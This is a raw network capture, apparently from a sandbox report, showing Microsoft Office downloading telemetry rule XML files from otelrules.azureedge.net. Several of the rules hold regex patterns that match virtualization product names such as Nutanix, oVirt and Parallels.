                                                  2024-10-13 17:34:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.44984813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:25 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7F164C3"
                                                  x-ms-request-id: c0284108-301e-005d-6416-1ce448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173425Z-17db6f7c8cf4g2pjavqhm24vp400000005d000000000am9f
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.44985013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:25 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                  ETag: "0x8DC582B9FF95F80"
                                                  x-ms-request-id: 150221b2-d01e-007a-13e9-1af38c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173425Z-17db6f7c8cfhrxld7punfw920n00000003y000000000aqm6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.44984913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:25 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                  ETag: "0x8DC582BA48B5BDD"
                                                  x-ms-request-id: ec734971-401e-0035-389c-1b82d8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173425Z-17db6f7c8cfq2j6f03aq9y8dns00000004dg00000000793b
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.44985213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:25 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3EAF226"
                                                  x-ms-request-id: 8f8e431e-b01e-0097-6fac-1b4f33000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173425Z-17db6f7c8cfpm9w8b1ybgtytds000000034g000000008zfq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.44985113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:25 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                  ETag: "0x8DC582BB650C2EC"
                                                  x-ms-request-id: 90f8132d-901e-002a-0d47-1c7a27000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173425Z-17db6f7c8cfvq8pt2ak3arkg6n000000039g000000000vkb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.44985313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:26 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 485
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                  ETag: "0x8DC582BB9769355"
                                                  x-ms-request-id: 7a709d5d-301e-0099-436d-1c6683000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfvq8pt2ak3arkg6n000000036g0000000097u8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:26 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.44985413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:26 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 411
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989AF051"
                                                  x-ms-request-id: d286cfb1-001e-0079-076b-1c12e8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cffhvbz3mt0ydz7x4000000039000000000kg8a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:26 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.44985513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:26 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 470
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBB181F65"
                                                  x-ms-request-id: 9a6afd11-d01e-0049-3e83-1be7dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cf96l6t7bwyfgbkhw000000045g00000000d9k4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:26 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.44985613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:26 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB556A907"
                                                  x-ms-request-id: 640ec2fa-901e-0083-59e1-1abb55000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfnqpbkckdefmqa44000000054g00000000eykw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  92192.168.2.44985713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:26 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 502
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6A0D312"
                                                  x-ms-request-id: 23e49b38-a01e-001e-1147-1c49ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cf9c22xp43k2gbqvn00000002t000000000dzfk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:26 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  93192.168.2.44986013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BB9B6040B"
                                                  x-ms-request-id: d2b2f6f8-f01e-0085-0622-1c88ea000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfvtw4hh2496wp8p800000003mg00000000bqds
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
